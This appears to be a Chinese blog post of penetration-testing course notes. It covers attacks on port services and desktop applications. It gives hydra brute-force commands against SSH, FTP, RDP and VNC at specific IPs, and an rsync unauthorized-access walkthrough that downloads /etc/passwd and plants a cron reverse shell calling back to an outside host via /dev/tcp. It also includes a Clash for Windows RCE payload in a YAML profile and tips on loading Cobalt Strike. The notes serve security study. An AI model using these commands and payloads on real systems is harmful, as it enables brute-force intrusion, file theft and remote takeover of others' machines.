本文发布于476天前,本文最后更新于475 天前,其中的信息可能已经过时,如有错误请留言或评论。
知识点
- 端口协议-弱口令&未授权&攻击方式等
- 桌面应用-社交类&文档类&工具类等
端口服务攻防
- nmap端口扫描获取端口服务以及服务版本
- 口令爆破 -hydra
- 未授权
- 漏洞(随机)
- ftp 爆破 ftp配置了匿名登录 ftp服务软件可能有漏洞
- 5900 vnc爆破 弱口令\认证绕过
- 向日葵 CVE-2022-10270(向日葵远程代码执行漏洞)
- teamviewer漏洞
常见端口服务
➢端口协议-口令爆破&未授权
常见端口渗透参考:https://mp.weixin.qq.com/s/xp_LOUmGImrRmkPrDqxKjw
Hydra
弱口令爆破工具hydra:https://github.com/vanhauser-thc/thc-hydra
- hydra是一个自动化的爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,已经集成到KaliLinux中,直接在终端打开即可
- 部分可选参数如下:
-s PORT 可通过这个参数指定非默认端口。 -l LOGIN 指定破解的用户,对特定用户破解。 -L FILE 指定用户名字典。 -p PASS 小写,指定密码破解,少用,一般是采用密码字典。 -P FILE 大写,指定密码字典。 -e ns 可选选项,n:空密码试探,s:使用指定用户和密码试探。 -C FILE 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数。 -M FILE 指定目标列表文件一行一条。 -o FILE 指定结果输出文件。 -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解。 -t TASKS 同时运行的线程数,默认为16。 -w TIME 设置最大超时的时间,单位秒,默认是30s。 -v / -V 显示详细过程。 server 目标ip service 指定服务名,支持的服务和协议:telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp等等。
- 例子:
FTP:文件传输协议 RDP:Windows远程桌面协议 SSH:Linux安全外壳协议 hydra -L usernames.txt-P 10top1K.txt 47.110.53.159 ftp -V hydra -l root -P 10top1K.txt 47.110.53.159 ssh -V hydra -l administrator -P 10top1K.txt 47.110.53.159 rdp -V hydra -L usernames.txt -P 10top1K.txt 47.110.53.159 vnc -V
未授权案例
- 未授权利用项目GitHub地址:https://github.com/xk11z/unauthorized
- 额但是好像不太准确?vulfocus开了个rsync靶场,它没识别出来,开了个redis未授权访问也没识别出来
了解
- rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
利用
- 判断:
rsync rsync://120.27.220.186:57830/
- 利用:
- 读取文件:
rsync rsync://120.27.220.186:57830/src/
- 下载文件:
rsync rsync://120.27.220.186:57830/src/etc/passwd ./
- 上传文件:
rsync -av passwd rsync://120.27.220.186:57830/src/tmp/passwd
- 读取文件:
- 反弹shell:
- 获取信息:
rsync rsync://120.27.220.186:57830/src/etc/crontab /root/cron.txt
- 创建文件
touch shell #!/bin/bash /bin/bash -i >& /dev/tcp/47.94.236.117/5566 0>&1 chmod +x shell
- 上传文件
rsync -av shell rsync://120.27.220.186:57830/src/etc/cron.hourly
- 等待接受反弹
- 获取信息:
- 只支持上传下载,不支持直接修改
➢桌面应用-QQ&WPS&Clash
QQ WPS RCE漏洞复现
- QQ RCE 漏洞复现
- 影响范围:QQ Windows版9.7.13及以前版本
- 见打包文档利用说明
- WPS RCE 漏洞复现
- 第80天复现讲过
- 实战中要生成免杀的后门或者木马直接上线CS
Clash RCE 漏洞复现
影响版本
- Windows:Clash.for.Windows 版别 <= v 0.19.8
- Mac:Clash.for.Windows.app版别 <= v0.19.81
利用
- 本地创立一个.yaml的文件
port: 7890 socks-port: 7891 allow-lan: true mode: Rule log-level: info external-controller: :9090 proxies: - name: a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: socks5 server: 127.0.0.1 port: "17938" skip-cert-verify: true - name: abc type: socks5 server: 127.0.0.1 port: "8088" skip-cert-verify: true proxy-groups: - name: <img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);> type: select proxies: - a<img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);>
- Profiles挑选导入.yaml
- 切换节点之后成功调用代码执行,执行了
- 若想上线CS,可以使用CS生成powershell上线payload,若不支持太长,可以exec远程下载然后再执行。
参考
学习内容均来自小迪安全系列课程:http://xiaodi8.com/
涉及软件网盘链接:https://pan.baidu.com/s/12xxwZ68mImgupT0W6lkX0Q?pwd=kq9q